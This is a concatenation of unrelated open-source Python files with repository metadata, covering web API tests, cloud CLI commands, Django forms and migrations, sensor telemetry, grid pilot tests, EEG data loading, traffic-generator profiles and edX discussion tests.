devent = DummyEvent(self.before_update)
self.app.on_pre_PATCH += devent
self.patch()
self.assertEqual(self.known_resource, devent.called[0])
self.assertEqual(3, len(devent.called))
def test_on_pre_PATCH_contacts(self):
devent = DummyEvent(self.before_update)
self.app.on_pre_PATCH_contacts += devent
self.patch()
self.assertEqual(2, len(devent.called))
def test_on_PATCH_dynamic_filter(self):
def filter_this(resource, request, lookup):
lookup["_id"] = self.unknown_item_id
self.app.on_pre_PATCH += filter_this
# Would normally patch the known document; will return 404 instead.
r, s = self.parse_response(self.patch())
self.assert404(s)
def test_on_post_PATCH(self):
devent = DummyEvent(self.after_update)
self.app.on_post_PATCH += devent
self.patch()
self.assertEqual(self.known_resource, devent.called[0])
self.assertEqual(200, devent.called[2].status_code)
self.assertEqual(3, len(devent.called))
def test_on_post_PATCH_contacts(self):
devent = DummyEvent(self.after_update)
self.app.on_post_PATCH_contacts += devent
self.patch()
self.assertEqual(200, devent.called[1].status_code)
self.assertEqual(2, len(devent.called))
def test_on_update(self):
devent = DummyEvent(self.before_update)
self.app.on_update += devent
self.patch()
self.assertEqual(self.known_resource, devent.called[0])
self.assertEqual(3, len(devent.called))
def test_on_update_contacts(self):
devent = DummyEvent(self.before_update)
self.app.on_update_contacts += devent
self.patch()
self.assertEqual(2, len(devent.called))
def test_on_updated(self):
devent = DummyEvent(self.after_update)
self.app.on_updated += devent
self.patch()
self.assertEqual(self.known_resource, devent.called[0])
self.assertEqual(3, len(devent.called))
def test_on_updated_contacts(self):
devent = DummyEvent(self.after_update)
self.app.on_updated_contacts += devent
self.patch()
self.assertEqual(2, len(devent.called))
def before_update(self):
db = self.connection[MONGO_DBNAME]
contact = db.contacts.find_one(ObjectId(self.item_id))
return contact['ref'] == self.item_name
def after_update(self):
return not self.before_update()
def patch(self):
headers = [('Content-Type', 'application/json'),
('If-Match', self.item_etag)]
data = json.dumps({"ref": self.new_ref})
return self.test_client.patch(
self.item_id_url, data=data, headers=headers)
|
jzorrof/eve
|
eve/tests/methods/patch.py
|
Python
|
bsd-3-clause
| 25,507 | 0 |
# Copyright 2009-2013 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from euca2ools.commands.ec2 import EC2Request
from requestbuilder import Arg, Filter
class DescribeBundleTasks(EC2Request):
DESCRIPTION = 'Describe current instance-bundling tasks'
ARGS = [Arg('BundleId', metavar='BUNDLE', nargs='*',
help='limit results to specific bundle tasks')]
FILTERS = [Filter('bundle-id', help='bundle task ID'),
Filter('error-code',
help='if the task failed, the error code returned'),
Filter('error-message',
help='if the task failed, the error message returned'),
Filter('instance-id', help='ID of the bundled instance'),
Filter('progress', help='level of task completion, in percent'),
Filter('s3-bucket',
help='bucket where the image will be stored'),
Filter('s3-prefix', help='beginning of the bundle name'),
Filter('start-time', help='task start time'),
Filter('state', help='task state'),
Filter('update-time', help='most recent task update time')]
LIST_TAGS = ['bundleInstanceTasksSet']
def print_result(self, result):
for task in result.get('bundleInstanceTasksSet', []):
self.print_bundle_task(task)
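# --- Usage note (illustrative only, not part of the original module) ---
# This request class backs the euca-describe-bundle-tasks command line tool;
# a typical invocation might look like the following (flag spelling can vary
# between euca2ools versions):
#   euca-describe-bundle-tasks --filter state=pending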
|
jhajek/euca2ools
|
euca2ools/commands/ec2/describebundletasks.py
|
Python
|
bsd-2-clause
| 2,642 | 0 |
from django import forms
from oldcontrib.media.document.models import Document
class DocumentUpload(forms.ModelForm):
class Meta:
model = Document
fields = ('document',)
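# --- Usage sketch (illustrative only, not part of the original module) ---
# A minimal view showing how this ModelForm could be used; the view name,
# template path, and URL name below are hypothetical.
from django.shortcuts import redirect, render

def upload_document(request):
    form = DocumentUpload(request.POST or None, request.FILES or None)
    if request.method == 'POST' and form.is_valid():
        form.save()
        return redirect('document_list')  # hypothetical URL name
    return render(request, 'document/upload.html', {'form': form})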
|
servee/django-servee-oldcontrib
|
oldcontrib/media/document/forms.py
|
Python
|
bsd-3-clause
| 190 | 0.010526 |
import json
import socket
from comms_manager import CommsManager
from constants import *
class BoardManager:
def __init__(self, args):
self.server_address = (args.IP, args.PORT)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.sock.connect(self.server_address)
self.cm = CommsManager(args.TO, args.FROM, args.TWKEY)
def activate(self):
"""
        Continuously feeds the server with sensor data and responds to training requests
"""
while True:
try:
humidity, temperature = self.cm.take_single_sample()
packet = json.dumps({'scores': {'temperature': temperature,
'humidity': humidity}})
self.sock.send(packet)
resp = self.sock.recv(1024)
if resp:
resp = json.loads(resp)
if resp['response'] == -1:
self.cm.send_sms(
message='There is a temperature problem at station 2. For detailed'
' info siemenshackathon://scheme.net.siemenshackathon')
self.cm.blink(2, 17)
if resp['responsesound'] == -1:
self.cm.send_sms(
message='There might be a malfunction at station 2. For detailed '
'info siemenshackathon://scheme.net.siemenshackathon')
self.cm.buzzer(2, 26)
if len([key for key, value in resp.iteritems() if key == 'train']):
                        # The train command runs a quick training pass over the
                        # environment data and sends the results back
self.cm.take_sample(20, 'temperature', 'humidity')
                        # The 'npy' field notifies the server of incoming training files
                        # Only temperature data is used for ML
self.sock.send(json.dumps({'npy': 1, 'humid_file_name': HUMIDITY_DATA_FILE,
'temp_file_name': TEMPERATURE_DATA_FILE}))
fdesc = open(TEMPERATURE_DATA_FILE, 'rb')
data = fdesc.read(1024)
while data:
self.sock.send(data)
data = fdesc.read(1024)
fdesc.close()
except Exception as e:
print 'Error occurred during sending file: ', str(e)
continue
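# --- Usage sketch (illustrative only, not part of the original module) ---
# A hypothetical command-line entry point; the argument names mirror the
# attributes that __init__ and CommsManager expect, and the help strings are
# guesses based on how they are used above.
if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser(description='Stream sensor data to the server')
    parser.add_argument('IP', help='server IP address')
    parser.add_argument('PORT', type=int, help='server port')
    parser.add_argument('TO', help='SMS recipient number')
    parser.add_argument('FROM', help='SMS sender number')
    parser.add_argument('TWKEY', help='messaging API key')
    BoardManager(parser.parse_args()).activate()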
|
TeamProxima/predictive-fault-tracker
|
board/board_manager.py
|
Python
|
mit
| 2,638 | 0.003412 |
"""Process `site.json` and bower package tools."""
import os
import json
import subprocess
from functools import partial
import importlib
import sys
from flask import Flask, render_template, g, redirect, current_app
from gitloader import git_show
from import_code import import_code
try:
from app import app
except ImportError:
from deckmaster.app import app
sys.path.append('.')
component_dir = 'static/components'
bower_str = 'bower install --config.directory="%s" %s > /dev/null'
def get_pkg_dir(package):
"""Join the component and package directory."""
return os.path.join(component_dir, package)
def get_pkg_main(package):
"""Check `package.json` then `bower.json` for the main included file."""
pkg = json.load(
open(os.path.join(get_pkg_dir(package), 'bower.json'))
)
if isinstance(pkg['main'],list):
return [os.path.join(get_pkg_dir(package), p) for p in pkg['main']]
else:
return os.path.join(get_pkg_dir(package), pkg['main'])
def check_pkg(package):
"""CHeck if the package exists, if not use bower to install."""
if not os.path.exists(os.path.join(component_dir, package)):
subprocess.call(
bower_str % (component_dir, package),
shell = True
)
return True
def script_or_style(path):
if path.endswith('js'):
return 'script'
elif path.endswith('css'):
return 'style'
else:
print "Script or style? " + path
def process_bower(deps):
retval = {'styles':[], 'scripts':[]}
try:
for pkg in deps['bower']:
check_pkg(pkg)
main = get_pkg_main(pkg)
if isinstance(main,list):
pkgassets = {}
for path in reversed(main):
try:
pkgassets[script_or_style(path)+'s'] = [path]
except TypeError:
pass
retval['scripts'] += pkgassets['scripts']
retval['styles'] += pkgassets['styles']
else:
retval[script_or_style(main)+'s'].append(main)
except KeyError:
pass
return retval
def process_local(deps):
retval = {'styles':[], 'scripts':[]}
try:
for path in deps['local']:
retval[script_or_style(path)+'s'].append(path)
except KeyError:
pass
return retval
def process_deps(deps):
"""Process script element in the config for local vs bower components."""
local, bower = process_local(deps), process_bower(deps)
retval = {}
for tag in local:
retval[tag] = local[tag] + bower[tag]
return retval
def process_route(route):
if not route.get('view'):
def route_handler(revid = None, path = None):
g.revid = revid
try:
return render_template(
'html/base.html', **process_deps(route['deps'])
)
except AttributeError:
return 'Not Found', 404
return route_handler
mname, fname = route['view'].rsplit('.', 1)
module = importlib.import_module(mname)
viewfunc = getattr(module, fname)
def route_handler(revid = None, path = None):
if revid is not None:
codestr = git_show('./views.py', revid)
mod = import_code(codestr, mname)
return getattr(mod,fname)()
return viewfunc()
return route_handler
def lazy_router(revid, path = None):
g.revid = revid
if path is None:
path = ''
if not path.startswith('/'):
path = '/' + path
cfgstr = git_show('./site.json', revid)
try:
return process_route(json.loads(cfgstr)[path])(revid, path)
except KeyError:
print cfgstr
def process_site(site = None, revid = None):
"""Process `site.json` based on the config and CLI options."""
if site is None:
try:
site = json.load(open('site.json'))
except IOError:
return []
if 'deps' in site:
return [
('/', 'index', process_route(site)),
('/<revid>/', 'index_revid', process_route(site)),
]
retval = [
('/favicon.ico', 'favicon', lambda: ''),
('/<revid>/', 'revid_lazy_index', lazy_router),
('/<revid>/<path:path>', 'revid_lazy', lazy_router),
]
for rt in site:
retval.append((rt, 'index' if rt=='/' else rt, process_route(site[rt])))
return retval
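# --- Usage sketch (illustrative only, not part of the original module) ---
# process_site() returns (rule, endpoint, view_func) tuples; a caller could
# register them on the Flask app roughly like this:
def register_routes(flask_app):
    for rule, endpoint, view_func in process_site():
        flask_app.add_url_rule(rule, endpoint, view_func)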
|
cacahootie/deckmaster
|
deckmaster/app/process_site.py
|
Python
|
mit
| 4,475 | 0.007374 |
""" Test class for Pilot
"""
# pylint: disable=protected-access, missing-docstring, invalid-name, line-too-long
# imports
import unittest
import json
import stat
import sys
import os
import shutil
from Pilot.pilotTools import PilotParams
from Pilot.pilotCommands import CheckWorkerNode, ConfigureSite, NagiosProbes
class PilotTestCase(unittest.TestCase):
""" Base class for the Agents test cases
"""
def setUp(self):
    # Define a local pilot.json file for the test, with all the necessary parameters
with open('pilot.json', 'w') as fp:
json.dump({'Setups': {'TestSetup': {'Commands': {'cetype1': 'x,y, z',
'cetype2': ['d', 'f']},
'CommandExtensions': 'TestExtension1,TestExtension2',
'NagiosProbes': 'Nagios1,Nagios2',
'NagiosPutURL': 'https://127.0.0.2/',
'Version': 'v1r1, v2r2'
}
},
'CEs': {'grid1.example.com': {'GridCEType': 'cetype1', 'Site': 'site.example.com'}},
'DefaultSetup': 'TestSetup'},
fp)
def tearDown(self):
for fileProd in [
'pilot.json',
'Nagios1',
'Nagios2',
'PilotAgentUUID',
'dev.tgz',
'pilot.out',
'123.txt',
'testing.tgz']:
try:
os.remove(fileProd)
except OSError:
pass
try:
shutil.rmtree('ReplacementCode')
except OSError:
pass
class CommandsTestCase(PilotTestCase):
""" Test case for each pilot command
"""
def test_InitJSON(self):
""" Test the pilot.json and command line parsing
"""
sys.argv[1:] = ['--Name', 'grid1.example.com', '--commandOptions', 'a=1,b=2', '-Z', 'c=3']
pp = PilotParams()
self.assertEqual(pp.commands, ['x', 'y', 'z'])
self.assertEqual(pp.commandExtensions, ['TestExtension1', 'TestExtension2'])
self.assertEqual(pp.commandOptions['a'], '1')
self.assertEqual(pp.commandOptions['b'], '2')
self.assertEqual(pp.commandOptions['c'], '3')
sys.argv[1:] = ['--Name', 'grid1.example.com',
'--commandOptions', 'a = 1, b=2', '-Z', ' c=3'] # just some spaces
pp = PilotParams()
self.assertEqual(pp.commandOptions['a'], '1')
self.assertEqual(pp.commandOptions['b'], '2')
self.assertEqual(pp.commandOptions['c'], '3')
sys.argv[1:] = ['--Name', 'grid1.example.com',
                        '--commandOptions=a = 1, b=2', '-Z', ' c=3']  # spaces and '='
pp = PilotParams()
self.assertEqual(pp.commandOptions['a'], '1')
self.assertEqual(pp.commandOptions['b'], '2')
self.assertEqual(pp.commandOptions['c'], '3')
def test_CheckWorkerNode(self):
""" Test CheckWorkerNode command
"""
pp = PilotParams()
cwn = CheckWorkerNode(pp)
res = cwn.execute()
self.assertEqual(res, None)
def test_ConfigureSite(self):
""" Test ConfigureSite command
"""
pp = PilotParams()
pp.configureScript = 'echo'
cs = ConfigureSite(pp)
res = cs.execute()
self.assertEqual(res, None)
def test_NagiosProbes(self):
""" Test NagiosProbes command
"""
pp = PilotParams()
nagios = NagiosProbes(pp)
with open('Nagios1', 'w') as fp:
fp.write('#!/bin/sh\necho 123\n')
os.chmod('Nagios1', stat.S_IRWXU)
with open('Nagios2', 'w') as fp:
fp.write('#!/bin/sh\necho 567\n')
os.chmod('Nagios2', stat.S_IRWXU)
nagios.execute()
self.assertEqual(nagios.nagiosProbes, ['Nagios1', 'Nagios2'])
self.assertEqual(nagios.nagiosPutURL, 'https://127.0.0.2/')
#############################################################################
# Test Suite run
#############################################################################
if __name__ == '__main__':
suite = unittest.defaultTestLoader.loadTestsFromTestCase(PilotTestCase)
suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(CommandsTestCase))
testResult = unittest.TextTestRunner(verbosity=2).run(suite)
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
|
wkrzemien/Pilot
|
Pilot/tests/Test_Pilot.py
|
Python
|
gpl-3.0
| 4,260 | 0.006103 |
import scipy.io
import scipy.signal
import os
import sys
import matplotlib
import pandas as pd
import numpy as np
import random
# Load a subject's matlab clips into a data panel
# subject = Patient_N or Dog_N
# downsample = True or False
# The segment type (interictal, ictal, or test) is inferred from each file name.
def LoadMAT(subject, downsample):
dir = '/Users/dryu/Documents/DataScience/Seizures/data/clips/'+ subject + '/'
dict = {}
#load files in numerical order
files = os.listdir(dir)
files2 =[]
for i in range(len(files)):
qp = files[i].rfind('_') +1
files2.append( files[i][0:qp] + (10-len(files[i][files[i].rfind('_')+1:]) )*'0' + files[i][qp:] )
#print len(files), len(files2)
t = {key:value for key, value in zip(files2,files)}
files2 = t.keys()
files2.sort()
f = [t[i] for i in files2]
j = 0
for i in f:
seg = i[i.rfind('_')+1 : i.find('.mat')] # Number of segment, e.g. Dog_1_interictal_segment_250.mat => 250
segtype = i[i[0:i.find('_segment')].rfind('_')+1: i.find('_segment')] # Type of segment: ictal, interictal, test
d = scipy.io.loadmat(dir+i)
if j==0:
cols = range(len(d['channels'][0,0]))
cols = cols +['time']
if segtype == 'interictal' or segtype == "test":
l = -3600.0#np.nan
else:
#print i
l = d['latency'][0]
df = pd.DataFrame(np.append(d['data'].T, l+np.array([range(len(d['data'][1]))]).T/d['freq'][0], 1 ), index=range(len(d['data'][1])), columns=cols)
if downsample:
if np.round(d['freq'][0]) == 5000:
df = df.groupby(lambda x: int(np.floor(x/20.0))).mean()
if np.round(d['freq'][0]) == 500:
df = df.groupby(lambda x: int(np.floor(x/2.0))).mean()
if np.round(d['freq'][0]) == 400:
df = df.groupby(lambda x: int(np.floor(x/2.0))).mean()
df['time'] = df['time'] - (df['time'][0]-np.floor(df['time'][0]))*(df['time'][0] > 0)
dict.update({segtype+'_'+seg : df})
j = j +1
data = pd.Panel(dict)
return data
def MATToPickle(subject, downsample):
print "Welcome to MATToPickle(" + subject + ", ",
if downsample:
print "True",
else:
print "False",
print ")"
pickle_directory = "/Users/dryu/Documents/DataScience/Seizures/data/pickles/"
pickle_filename = subject
if downsample:
pickle_filename += "_downsampled"
pickle_filename = pickle_filename + ".pkl"
SavePanelAsPickle(LoadMAT(subject, downsample), pickle_filename)
def SavePanelAsPickle(data, pickle_filename):
data.to_pickle(pickle_filename)
def LoadPanelFromPickle(subject, downsample):
pickle_directory = "/Users/dryu/Documents/DataScience/Seizures/data/pickles/"
pickle_filename = subject
if downsample:
pickle_filename += "_downsampled"
pickle_filename += ".pkl"
return pd.read_pickle(pickle_filename)
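# --- Usage sketch (illustrative only, not part of the original module) ---
# Reloading a previously pickled panel for analysis; the subject name below
# is just an example.
def example_reload(subject='Dog_1', downsample=True):
    return LoadPanelFromPickle(subject, downsample)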
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description = 'Process input data into pandas pickles')
parser.add_argument('subjects', type=str, help='Subject, or all to do all subjects')
parser.add_argument('--downsample', action='store_true', help='Downsample data')
args = parser.parse_args()
if args.subjects == "all":
subjects = ['Dog_1','Dog_2', 'Dog_3', 'Dog_4', 'Patient_1', 'Patient_2', 'Patient_3', 'Patient_4','Patient_5','Patient_6','Patient_7','Patient_8',]
else:
subjects = [args.subjects]
for subject in subjects:
MATToPickle(subject, args.downsample)
|
DryRun/seizures
|
code/dataIO.py
|
Python
|
gpl-3.0
| 3,438 | 0.041303 |
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# channel `#navitia` on riot https://riot.im/app/#/room/#navitia:matrix.org
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
from flask import request
from werkzeug.exceptions import HTTPException
import logging
from jormungandr.new_relic import record_exception
__all__ = ["RegionNotFound", "DeadSocketException", "ApiNotFound", "InvalidArguments"]
def format_error(code, message):
error = {"error": {"id": code, "message": message}, "message": message}
return error
class RegionNotFound(HTTPException):
def __init__(self, region=None, lon=None, lat=None, object_id=None, custom_msg=None):
super(RegionNotFound, self).__init__()
self.code = 404
if custom_msg:
self.data = format_error("unknown_object", custom_msg)
return
if object_id:
if object_id.count(";") == 1:
lon, lat = object_id.split(";")
object_id = None
elif object_id[:6] == "coord:":
lon, lat = object_id[6:].split(":")
object_id = None
if not any([region, lon, lat, object_id]):
self.data = format_error("unknown_object", "No region nor " "coordinates given")
elif region and not any([lon, lat, object_id]):
self.data = format_error("unknown_object", "The region {0} " "doesn't exists".format(region))
elif not any([region, object_id]) and lon and lat:
self.data = format_error(
"unknown_object",
"No region available for the coordinates:" "{lon}, {lat}".format(lon=lon, lat=lat),
)
elif region == lon == lat is None and object_id:
self.data = format_error("unknown_object", "Invalid id : {id}".format(id=object_id))
else:
self.data = format_error("unknown_object", "Unable to parse region")
def __str__(self):
return repr(self.data['message'])
class DeadSocketException(HTTPException):
def __init__(self, region, path):
super(DeadSocketException, self).__init__()
error = 'The region {} is dead'.format(region)
self.data = format_error("dead_socket", error)
self.code = 503
class ApiNotFound(HTTPException):
def __init__(self, api):
super(ApiNotFound, self).__init__()
error = 'The api {} doesn\'t exist'.format(api)
self.data = format_error("unknown_object", error)
self.code = 404
class UnknownObject(HTTPException):
def __init__(self, msg):
super(UnknownObject, self).__init__()
error = 'The object {} doesn\'t exist'.format(msg)
self.data = format_error("unknown_object", error)
self.code = 404
class InvalidArguments(HTTPException):
def __init__(self, arg):
super(InvalidArguments, self).__init__()
self.data = format_error("unknown_object", "Invalid arguments " + arg)
self.code = 400
class UnableToParse(HTTPException):
def __init__(self, msg):
super(UnableToParse, self).__init__()
self.data = format_error("unable_to_parse", msg)
self.code = 400
class TechnicalError(HTTPException):
def __init__(self, msg):
super(TechnicalError, self).__init__()
self.data = format_error("technical_error", msg)
self.code = 500
class ConfigException(Exception):
def __init__(self, arg):
super(ConfigException, self).__init__(arg)
self.data = format_error("config_exception", "Invalid config " + arg)
self.code = 400
def log_exception(sender, exception, **extra):
logger = logging.getLogger(__name__)
message = ""
if hasattr(exception, "data") and "message" in exception.data:
message = exception.data['message']
error = '{} {} {}'.format(exception.__class__.__name__, message, request.url)
if isinstance(exception, (HTTPException, RegionNotFound)):
logger.debug(error)
if exception.code >= 500:
record_exception()
else:
logger.exception(error)
record_exception()
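# --- Usage sketch (illustrative only, not part of this module) ---
# A view can simply raise one of these exceptions; Flask's HTTPException
# handling then serializes ``self.data`` with the matching status code.
# The lookup helper below is a hypothetical illustration.
def example_region_lookup(region_name, known_regions):
    if region_name not in known_regions:
        raise RegionNotFound(region=region_name)
    return known_regions[region_name]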
|
xlqian/navitia
|
source/jormungandr/jormungandr/exceptions.py
|
Python
|
agpl-3.0
| 5,255 | 0.001713 |
#!/usr/bin/env python
from __future__ import unicode_literals
from setuptools import setup
setup(
name='xcache',
version='0.2',
description='clean caches when needed',
author='Sven R. Kunze',
author_email='srkunze@mail.de',
url='https://github.com/srkunze/xcache',
license='MIT',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
],
py_modules=['xcache'],
install_requires=[],
)
|
srkunze/xcache
|
setup.py
|
Python
|
mit
| 573 | 0 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Currency'
db.create_table(u'currency_currency', (
('iso_code', self.gf('django.db.models.fields.CharField')(max_length=3, primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=120)),
('rate', self.gf('django.db.models.fields.FloatField')()),
))
db.send_create_signal(u'currency', ['Currency'])
def backwards(self, orm):
# Deleting model 'Currency'
db.delete_table(u'currency_currency')
models = {
u'currency.currency': {
'Meta': {'object_name': 'Currency'},
'iso_code': ('django.db.models.fields.CharField', [], {'max_length': '3', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'rate': ('django.db.models.fields.FloatField', [], {}),
}
}
complete_apps = ['currency']
|
pombredanne/1trillioneuros
|
webapp/currency/migrations/0001_initial.py
|
Python
|
gpl-3.0
| 1,131 | 0.006189 |
from django.utils import unittest
from spacescout_web.test.not_found import NotFound404Test
from spacescout_web.test.url_filtering import URLFiltering
|
uw-it-aca/spacescout_web
|
spacescout_web/tests.py
|
Python
|
apache-2.0
| 152 | 0 |
from trex_astf_lib.api import *
# TCP buffer size tunable example
#
# tcp.rxbufsize
# tcp.txbufsize
#
class Prof1():
def __init__(self):
pass
def get_profile(self, **kwargs):
# ip generator
ip_gen_c = ASTFIPGenDist(ip_range=["16.0.0.0", "16.0.0.255"], distribution="seq")
ip_gen_s = ASTFIPGenDist(ip_range=["48.0.0.0", "48.0.255.255"], distribution="seq")
ip_gen = ASTFIPGen(glob=ASTFIPGenGlobal(ip_offset="1.0.0.0"),
dist_client=ip_gen_c,
dist_server=ip_gen_s)
c_glob_info = ASTFGlobalInfo()
c_glob_info.tcp.rxbufsize = 8*1024
c_glob_info.tcp.txbufsize = 8*1024
s_glob_info = ASTFGlobalInfo()
s_glob_info.tcp.rxbufsize = 8*1024
s_glob_info.tcp.txbufsize = 8*1024
return ASTFProfile(default_ip_gen=ip_gen,
                           # Defaults affect all files
default_c_glob_info=c_glob_info,
default_s_glob_info=s_glob_info,
cap_list=[
ASTFCapInfo(file="../avl/delay_10_http_browsing_0.pcap", cps=1)
]
)
def register():
return Prof1()
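# --- Usage note (illustrative only, not part of the original profile) ---
# The TRex ASTF loader imports this module and calls register() to obtain the
# profile object; conceptually that is roughly equivalent to:
#   profile = register().get_profile()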
|
kisel/trex-core
|
scripts/astf/param_tcp_rxbufsize_8k.py
|
Python
|
apache-2.0
| 1,298 | 0.006163 |
# pylint: skip-file
import datetime
import json
import sys
from unittest import mock
from unittest.mock import Mock, patch
import ddt
import pytest
from django.test import RequestFactory, TestCase
from django.urls import reverse
from edx_django_utils.cache import RequestCache
from opaque_keys.edx.keys import CourseKey
from pytz import UTC
import lms.djangoapps.discussion.django_comment_client.utils as utils
from common.djangoapps.course_modes.models import CourseMode
from common.djangoapps.course_modes.tests.factories import CourseModeFactory
from common.djangoapps.student.roles import CourseStaffRole
from common.djangoapps.student.tests.factories import AdminFactory, CourseEnrollmentFactory, UserFactory
from lms.djangoapps.courseware.tabs import get_course_tab_list
from lms.djangoapps.courseware.tests.factories import InstructorFactory
from lms.djangoapps.discussion.django_comment_client.constants import TYPE_ENTRY, TYPE_SUBCATEGORY
from lms.djangoapps.discussion.django_comment_client.tests.factories import RoleFactory
from lms.djangoapps.discussion.django_comment_client.tests.unicode import UnicodeTestMixin
from lms.djangoapps.discussion.django_comment_client.tests.utils import config_course_discussions, topic_name_to_id
from lms.djangoapps.teams.tests.factories import CourseTeamFactory
from openedx.core.djangoapps.course_groups import cohorts
from openedx.core.djangoapps.course_groups.cohorts import set_course_cohorted
from openedx.core.djangoapps.course_groups.tests.helpers import CohortFactory, config_course_cohorts
from openedx.core.djangoapps.django_comment_common.comment_client.utils import (
CommentClientMaintenanceError,
perform_request
)
from openedx.core.djangoapps.django_comment_common.models import (
CourseDiscussionSettings,
DiscussionsIdMapping,
ForumsConfig,
assign_role
)
from openedx.core.djangoapps.django_comment_common.utils import (
get_course_discussion_settings,
seed_permissions_roles,
set_course_discussion_settings
)
from openedx.core.djangoapps.util.testing import ContentGroupTestCase
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.tests.django_utils import TEST_DATA_MIXED_MODULESTORE, ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory, ToyCourseFactory
class DictionaryTestCase(TestCase):
def test_extract(self):
d = {'cats': 'meow', 'dogs': 'woof'}
k = ['cats', 'dogs', 'hamsters']
expected = {'cats': 'meow', 'dogs': 'woof', 'hamsters': None}
assert utils.extract(d, k) == expected
def test_strip_none(self):
d = {'cats': 'meow', 'dogs': 'woof', 'hamsters': None}
expected = {'cats': 'meow', 'dogs': 'woof'}
assert utils.strip_none(d) == expected
def test_strip_blank(self):
d = {'cats': 'meow', 'dogs': 'woof', 'hamsters': ' ', 'yetis': ''}
expected = {'cats': 'meow', 'dogs': 'woof'}
assert utils.strip_blank(d) == expected
class AccessUtilsTestCase(ModuleStoreTestCase):
"""
Base testcase class for access and roles for the
comment client service integration
"""
CREATE_USER = False
def setUp(self):
super().setUp()
self.course = CourseFactory.create()
self.course_id = self.course.id
self.student_role = RoleFactory(name='Student', course_id=self.course_id)
self.moderator_role = RoleFactory(name='Moderator', course_id=self.course_id)
self.community_ta_role = RoleFactory(name='Community TA', course_id=self.course_id)
self.student1 = UserFactory(username='student', email='student@edx.org')
self.student1_enrollment = CourseEnrollmentFactory(user=self.student1)
self.student_role.users.add(self.student1)
self.student2 = UserFactory(username='student2', email='student2@edx.org')
self.student2_enrollment = CourseEnrollmentFactory(user=self.student2)
self.moderator = UserFactory(username='moderator', email='staff@edx.org', is_staff=True)
self.moderator_enrollment = CourseEnrollmentFactory(user=self.moderator)
self.moderator_role.users.add(self.moderator)
self.community_ta1 = UserFactory(username='community_ta1', email='community_ta1@edx.org')
self.community_ta_role.users.add(self.community_ta1)
self.community_ta2 = UserFactory(username='community_ta2', email='community_ta2@edx.org')
self.community_ta_role.users.add(self.community_ta2)
self.course_staff = UserFactory(username='course_staff', email='course_staff@edx.org')
CourseStaffRole(self.course_id).add_users(self.course_staff)
def test_get_role_ids(self):
ret = utils.get_role_ids(self.course_id)
expected = {'Moderator': [3], 'Community TA': [4, 5]}
assert ret == expected
def test_has_discussion_privileges(self):
assert not utils.has_discussion_privileges(self.student1, self.course_id)
assert not utils.has_discussion_privileges(self.student2, self.course_id)
assert not utils.has_discussion_privileges(self.course_staff, self.course_id)
assert utils.has_discussion_privileges(self.moderator, self.course_id)
assert utils.has_discussion_privileges(self.community_ta1, self.course_id)
assert utils.has_discussion_privileges(self.community_ta2, self.course_id)
def test_has_forum_access(self):
ret = utils.has_forum_access('student', self.course_id, 'Student')
assert ret
ret = utils.has_forum_access('not_a_student', self.course_id, 'Student')
assert not ret
ret = utils.has_forum_access('student', self.course_id, 'NotARole')
assert not ret
@ddt.ddt
class CoursewareContextTestCase(ModuleStoreTestCase):
"""
Base testcase class for courseware context for the
comment client service integration
"""
def setUp(self):
super().setUp()
self.course = CourseFactory.create(org="TestX", number="101", display_name="Test Course")
self.discussion1 = ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion1",
discussion_category="Chapter",
discussion_target="Discussion 1"
)
self.discussion2 = ItemFactory.create(
parent_location=self.course.location,
